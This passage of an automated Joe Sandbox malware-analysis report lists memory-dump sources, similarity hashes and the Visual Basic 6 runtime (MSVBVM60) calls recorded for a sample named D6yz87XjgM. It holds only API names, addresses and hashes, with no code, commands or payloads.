                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$CheckFreeHresultMove$#526#644AddrefChkstk
                                                                    • String ID: 8W
                                                                    • API String ID: 2274909516-3003775163
                                                                    • Opcode ID: e8fc07a90a1d07be16fcf60e637534c8df1155d5e90aebd862b97251534c0200
                                                                    • Instruction ID: db6af336019c2f5c1bc1a65a90e5f53766e7b1e82d45f8f733dd9c4d0a4dc04f
                                                                    • Opcode Fuzzy Hash: e8fc07a90a1d07be16fcf60e637534c8df1155d5e90aebd862b97251534c0200
                                                                    • Instruction Fuzzy Hash: E3310271D00209AFCF14EB95D886FEEBBB9BF08308F10842AF211B61A1DB7959459F54
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0054BF80
                                                                    • __vbaVarVargNofree.MSVBVM60(?,?,?,?,00401006), ref: 0054BFA1
                                                                    • __vbaStrVarVal.MSVBVM60(?,00000000,?,?,?,?,00401006), ref: 0054BFAB
                                                                    • #644.MSVBVM60(00000000,?,00000000,?,?,?,?,00401006), ref: 0054BFB1
                                                                    • __vbaSetSystemError.MSVBVM60(?,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,?,00000000,?,?,?,?,00401006), ref: 0054BFD6
                                                                    • __vbaFreeStr.MSVBVM60(?,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,?,00000000,?,?,?,?,00401006), ref: 0054BFE4
                                                                    • __vbaAryLock.MSVBVM60(?,?,?,?,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,?,00000000), ref: 0054C011
                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?,?,00000000,?,?,?,?,C0000000,00000003,00000000,00000002,00000080,00000000,00000000), ref: 0054C038
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,?,?,00000000,?,?,?,?,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 0054C041
                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,?,00000000), ref: 0054C04E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$ErrorSystem$#644ChkstkFreeLockNofreeUnlockVarg
                                                                    • String ID: xW
                                                                    • API String ID: 2579818117-3959070962
                                                                    • Opcode ID: 2df8ab17d827822fcfa76c1284f0034100718ecb9107b8d549b0ddbf97f2195d
                                                                    • Instruction ID: 192f39e66e64bfa43caceffed566fae4a39c1a85a906661e1204cdacecdbcd7a
                                                                    • Opcode Fuzzy Hash: 2df8ab17d827822fcfa76c1284f0034100718ecb9107b8d549b0ddbf97f2195d
                                                                    • Instruction Fuzzy Hash: 16312175940208AFDB04EFA5DC86FAE7BB8FF08704F10402AF504BB1A1D679AD409B64
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0054ED3B
                                                                    • __vbaVarDup.MSVBVM60(?,00000008,?,?,00401006), ref: 0054ED53
                                                                    • #653.MSVBVM60(?,?,?,00000008,?,?,00401006), ref: 0054ED60
                                                                    • __vbaI4Var.MSVBVM60(?,?,?,?,00000008,?,?,00401006), ref: 0054ED69
                                                                    • __vbaFreeVar.MSVBVM60 ref: 0054ED82
                                                                    • #632.MSVBVM60(?,?,00000001,00000002), ref: 0054EDB7
                                                                    • __vbaVarCat.MSVBVM60(?,?,?,?,?,00000001,00000002), ref: 0054EDC8
                                                                    • __vbaVarMove.MSVBVM60(?,?,?,?,?,00000001,00000002), ref: 0054EDD2
                                                                    • __vbaFreeVarList.MSVBVM60(00000002,00000002,?,?,?,?,?,?,00000001,00000002), ref: 0054EDE1
                                                                    • __vbaFreeVar.MSVBVM60(0054EE24), ref: 0054EE1E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$Free$#632#653ChkstkListMove
                                                                    • String ID: xW
                                                                    • API String ID: 2607714180-3959070962
                                                                    • Opcode ID: 971f90e7f6479259f2701a99c696fc132c3bb46f21539c5bbf785a0a335ba9ee
                                                                    • Instruction ID: a60065ef5625635295de07d58326c852687716f5b13b79ba8a227ab5b49ac320
                                                                    • Opcode Fuzzy Hash: 971f90e7f6479259f2701a99c696fc132c3bb46f21539c5bbf785a0a335ba9ee
                                                                    • Instruction Fuzzy Hash: C2219871C0024CAADB11EBD5D886EDEBFBCBF08708F54452AF201B7191E77865898B95
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0054C429
                                                                    • __vbaStrCat.MSVBVM60(0040AA70,0040AA58,?,00000004,00000000,?,?,?,?,00401006), ref: 0054C44D
                                                                    • __vbaStrMove.MSVBVM60(0040AA70,0040AA58,?,00000004,00000000,?,?,?,?,00401006), ref: 0054C457
                                                                    • __vbaStrCat.MSVBVM60(0040A6E8,00000000,0040AA70,0040AA58,?,00000004,00000000,?,?,?,?,00401006), ref: 0054C462
                                                                    • __vbaStrMove.MSVBVM60(0040A6E8,00000000,0040AA70,0040AA58,?,00000004,00000000,?,?,?,?,00401006), ref: 0054C46C
                                                                    • __vbaI4Str.MSVBVM60(00000000,0040A6E8,00000000,0040AA70,0040AA58,?,00000004,00000000,?,?,?,?,00401006), ref: 0054C472
                                                                    • __vbaSetSystemError.MSVBVM60(000000FF,00000000,00000000,0040A6E8,00000000,0040AA70,0040AA58,?,00000004,00000000,?,?,?,?,00401006), ref: 0054C47F
                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,000000FF,00000000,00000000,0040A6E8,00000000,0040AA70,0040AA58,?,00000004,00000000), ref: 0054C48E
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$Move$ChkstkErrorFreeListSystem
                                                                    • String ID:
                                                                    • API String ID: 3065699893-0
                                                                    • Opcode ID: e560b1dbb9f15ab8904598cb4d9373c89c1f86b33dbe0715104456120b286f48
                                                                    • Instruction ID: 0d4f66b336172ca0e7ed6be2c7eaf642c058fd5b42df34e286e30b2c8463487c
                                                                    • Opcode Fuzzy Hash: e560b1dbb9f15ab8904598cb4d9373c89c1f86b33dbe0715104456120b286f48
                                                                    • Instruction Fuzzy Hash: D501A7B1A403487AD704F7A1CD07FBF7A6CAB08B48F20053FB211BA0E1E97C5900566A
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(00000000,00401006,?,?,?,0054B849,00000000,-00000004,00000000,00000000,00000000,0000E0FF,0040A1FC,0057F2CC,00000000), ref: 0054BB48
                                                                      • Part of subcall function 0054C16A: __vbaChkstk.MSVBVM60(?,0054BB64,0054B8E6,?,00000008,?,00000000,00401006,?,?,?,0054B849,00000000,-00000004,00000000,00000000), ref: 0054C170
                                                                    • #644.MSVBVM60(?,0054B8E6,?,00000008,?,00000000,00401006,?,?,?,0054B849,00000000,-00000004,00000000,00000000,00000000), ref: 0054BB74
                                                                    • #644.MSVBVM60(00000001,?,0054B8E6,?,00000008,?,00000000,00401006,?,?,?,0054B849,00000000,-00000004,00000000,00000000), ref: 0054BB83
                                                                    • #644.MSVBVM60(?,00000000,00000001,?,0054B8E6,?,00000008,?,00000000,00401006,?,?,?,0054B849,00000000,-00000004), ref: 0054BB9F
                                                                    • #644.MSVBVM60(00000000,?,00000004,?,00000000,00000001,?,0054B8E6,?,00000008,?,00000000,00401006), ref: 0054BBC6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: #644$Chkstk__vba
                                                                    • String ID: 8W
                                                                    • API String ID: 1305800526-3003775163
                                                                    • Opcode ID: 786665c174d08e2921301997fd107ee1bc15032c6473552101a6bc23b85453c0
                                                                    • Instruction ID: 095a2ba6fb918f2f97f339ca7088dd5aea831ccf376dd522f44e5fa7f127fcd3
                                                                    • Opcode Fuzzy Hash: 786665c174d08e2921301997fd107ee1bc15032c6473552101a6bc23b85453c0
                                                                    • Instruction Fuzzy Hash: 82118F75540204AFEB01DFA4DE86F9E7FB8FB18708F100165F105FA2A1CA35AD40EB64
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(00004008,00401006,?,?,?,0054C62D,00004008), ref: 0057D1D1
                                                                    • __vbaVarVargNofree.MSVBVM60(?,?,?,00004008,00401006,?,?,?,0054C62D,00004008), ref: 0057D1E9
                                                                    • __vbaStrVarVal.MSVBVM60(00000104,00000000,?,?,?,00004008,00401006,?,?,?,0054C62D,00004008), ref: 0057D1F3
                                                                    • #644.MSVBVM60(00000000,00000104,00000000,?,?,?,00004008,00401006,?,?,?,0054C62D,00004008), ref: 0057D1F9
                                                                    • __vbaFreeStr.MSVBVM60(00000000,00000104,00000000,?,?,?,00004008,00401006,?,?,?,0054C62D,00004008), ref: 0057D204
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$#644ChkstkFreeNofreeVarg
                                                                    • String ID: W
                                                                    • API String ID: 1831340853-2402654308
                                                                    • Opcode ID: e808c745aa0593323adcec7fb224d4205008d5ff9b7d073a4c0137bfef03dfd5
                                                                    • Instruction ID: af982c6c61f84de2d0eeed4a108803e1e73d5a3a614292cc74b9c7801023e8d9
                                                                    • Opcode Fuzzy Hash: e808c745aa0593323adcec7fb224d4205008d5ff9b7d073a4c0137bfef03dfd5
                                                                    • Instruction Fuzzy Hash: 0EF05471840248FACB14EB91CC47F9F7F7CEB08748F10852AB205771A1DA78694186A4
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0054C0A2
                                                                      • Part of subcall function 0054C16A: __vbaChkstk.MSVBVM60(?,0054BB64,0054B8E6,?,00000008,?,00000000,00401006,?,?,?,0054B849,00000000,-00000004,00000000,00000000), ref: 0054C170
                                                                    • #644.MSVBVM60(?,005539B5,?,?,?,?,00401006), ref: 0054C0C5
                                                                    • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,-00000005,00000000,?,00000000,?,005539B5,?,?,?,?,00401006), ref: 0054C0F0
                                                                    • __vbaAryLock.MSVBVM60(?,?), ref: 0054C101
                                                                    • #644.MSVBVM60(?,?,?), ref: 0054C117
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,?), ref: 0054C123
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$#644Chkstk$LockRedimUnlock
                                                                    • String ID:
                                                                    • API String ID: 2226984211-0
                                                                    • Opcode ID: 94a996a5cd86e26a72164f9077ac95f0414b4fcf0ca18834adb9b901733c067f
                                                                    • Instruction ID: 8f0c33fb2cb5c9a3477ca9c6b9fca8a523aecd093b74544783286983c67b5029
                                                                    • Opcode Fuzzy Hash: 94a996a5cd86e26a72164f9077ac95f0414b4fcf0ca18834adb9b901733c067f
                                                                    • Instruction Fuzzy Hash: A6210E71940209ABDF44DFA8CD86FEE7BB8FF08748F14412AF500BB291D67999448B65
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006,?,?,?,0054CD8C,?,?,?,?,?,?,?), ref: 0057D34B
                                                                      • Part of subcall function 0057D41B: __vbaChkstk.MSVBVM60(00000016,00401006,?,?,?,0057D36D,00000016,?,?,?,?,00401006,?,?,?,0054CD8C), ref: 0057D436
                                                                      • Part of subcall function 0057D41B: __vbaRedim.MSVBVM60(00000080,00000001,00000011,00000001,00004000,00000000,?,?,?,00000016,00401006,?,?,?,0057D36D,00000016), ref: 0057D46F
                                                                      • Part of subcall function 0057D41B: __vbaAryLock.MSVBVM60(00000016,0057F368,?,?,?,00000016,00401006,?,?,?,0057D36D,00000016,?,?,?,?), ref: 0057D4D9
                                                                      • Part of subcall function 0057D41B: #644.MSVBVM60(?,00000016,0057F368,?,?,?,00000016,00401006,?,?,?,0057D36D,00000016), ref: 0057D4F5
                                                                      • Part of subcall function 0057D41B: __vbaAryUnlock.MSVBVM60(00000016,?,00000016,0057F368,?,?,?,00000016,00401006,?,?,?,0057D36D,00000016), ref: 0057D501
                                                                    • #644.MSVBVM60(?,00000016,?,?,?,?,00401006,?,?,?,0054CD8C,?,?,?,?,?), ref: 0057D389
                                                                    • #644.MSVBVM60(?,00000016,?,?,00000016,?,?,?,?,00401006,?,?,?,0054CD8C,?,?), ref: 0057D3A3
                                                                    • #644.MSVBVM60(00549287,00000016,?,?,00000016,?,?,00000016,?,?,?,?,00401006), ref: 0057D3C5
                                                                    • #644.MSVBVM60(?,?,?,00549287,00000016,?,?,00000016,?,?,00000016,?,?,?,?,00401006), ref: 0057D3DC
                                                                    • #644.MSVBVM60(?,?,?,?,00549287,00000016,?,?,00000016,?,?,00000016,?,?,?,?), ref: 0057D3E8
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: #644$__vba$Chkstk$LockRedimUnlock
                                                                    • String ID:
                                                                    • API String ID: 2110399347-0
                                                                    • Opcode ID: 983f70ab617174a9a54e4f17c05007d03188a67f962ad8e41726d598eac6395f
                                                                    • Instruction ID: 6c03304b8f3dc70164b83b1602624dcd9af7e3f63e47b8d2fb8529a63fcbcd93
                                                                    • Opcode Fuzzy Hash: 983f70ab617174a9a54e4f17c05007d03188a67f962ad8e41726d598eac6395f
                                                                    • Instruction Fuzzy Hash: 3021E9B0C40209AFDF40DFA5C945AEFBAB9FF08344F108426F104B6251D77959019F65
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0054C19E
                                                                    • __vbaVarVargNofree.MSVBVM60(?,?,?,?,00401006), ref: 0054C1B6
                                                                    • __vbaStrVarVal.MSVBVM60(?,00000000,?,?,?,?,00401006), ref: 0054C1C0
                                                                    • #644.MSVBVM60(00000000,?,00000000,?,?,?,?,00401006), ref: 0054C1C6
                                                                    • __vbaVarMove.MSVBVM60 ref: 0054C1DB
                                                                    • __vbaFreeStr.MSVBVM60 ref: 0054C1E3
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$#644ChkstkFreeMoveNofreeVarg
                                                                    • String ID:
                                                                    • API String ID: 2413382268-0
                                                                    • Opcode ID: d7e1ba4c08c14f5785ee7417a10360ef3d3efb9498f41ba9673767473762ff6c
                                                                    • Instruction ID: f1241b988fa3b50461f7f14b0c32666c98d8bc1f53eb74c986954f501f240072
                                                                    • Opcode Fuzzy Hash: d7e1ba4c08c14f5785ee7417a10360ef3d3efb9498f41ba9673767473762ff6c
                                                                    • Instruction Fuzzy Hash: 91F0FF75800208ABCB15EBD6C846FDEBFBCBF48748F54452AF101B61A1DBB85645CB94
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006,?,?,?,0054D466,?,00006011,?,?,?,?,00401006), ref: 0054D3A5
                                                                    • __vbaRefVarAry.MSVBVM60(?,?,?,?,?,00401006,?,?,?,0054D466,?,00006011,?,?,?,?), ref: 0054D3BA
                                                                    • __vbaUbound.MSVBVM60(00000001,00000000,?,?,?,?,?,00401006,?,?,?,0054D466,?,00006011), ref: 0054D3C3
                                                                    • __vbaVarMove.MSVBVM60(00000001,00000000,?,?,?,?,?,00401006,?,?,?,0054D466,?,00006011), ref: 0054D3D8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$ChkstkMoveUbound
                                                                    • String ID: W
                                                                    • API String ID: 2614284155-2402654308
                                                                    • Opcode ID: b703f215554d68a9c61ba510fa19d8d8e3c7f9bf4e0a603e69dbcc4552ecefd0
                                                                    • Instruction ID: c3139827b9ac323ad44ba616676741dae91d5cd3a5d912c9f6fe5f13d274f031
                                                                    • Opcode Fuzzy Hash: b703f215554d68a9c61ba510fa19d8d8e3c7f9bf4e0a603e69dbcc4552ecefd0
                                                                    • Instruction Fuzzy Hash: 92F08C70840248BFDB11EF91CC46F8DBFB8FB08B48F10452AF100BA5A1D7B929008BA5
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(00000016,00401006,?,?,?,0057D36D,00000016,?,?,?,?,00401006,?,?,?,0054CD8C), ref: 0057D436
                                                                    • __vbaRedim.MSVBVM60(00000080,00000001,00000011,00000001,00004000,00000000,?,?,?,00000016,00401006,?,?,?,0057D36D,00000016), ref: 0057D46F
                                                                    • __vbaAryLock.MSVBVM60(00000016,0057F368,?,?,?,00000016,00401006,?,?,?,0057D36D,00000016,?,?,?,?), ref: 0057D4D9
                                                                    • #644.MSVBVM60(?,00000016,0057F368,?,?,?,00000016,00401006,?,?,?,0057D36D,00000016), ref: 0057D4F5
                                                                    • __vbaAryUnlock.MSVBVM60(00000016,?,00000016,0057F368,?,?,?,00000016,00401006,?,?,?,0057D36D,00000016), ref: 0057D501
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$#644ChkstkLockRedimUnlock
                                                                    • String ID:
                                                                    • API String ID: 972739294-0
                                                                    • Opcode ID: 719e475dc55de300429c2546a323fbe43869b111c77b92af381720fabcddfc55
                                                                    • Instruction ID: e6c73999f4da42f1d13d175eed078c339e326b0dc60166821fe6e562e65bfa95
                                                                    • Opcode Fuzzy Hash: 719e475dc55de300429c2546a323fbe43869b111c77b92af381720fabcddfc55
                                                                    • Instruction Fuzzy Hash: 5631FB78A002059FDB04CF58EC81FAD7BF5FB08318F14855AE509AB3A2DB75E880EB54
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0054F52A
                                                                    • __vbaNew2.MSVBVM60(0040B19C,0057FB40,?,?,?,?,00401006), ref: 0054F56B
                                                                    • __vbaObjSetAddref.MSVBVM60(?,0057E3A8), ref: 0054F58F
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B18C,00000010), ref: 0054F5B8
                                                                    • __vbaFreeObj.MSVBVM60 ref: 0054F5C9
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$AddrefCheckChkstkFreeHresultNew2
                                                                    • String ID:
                                                                    • API String ID: 3149954519-0
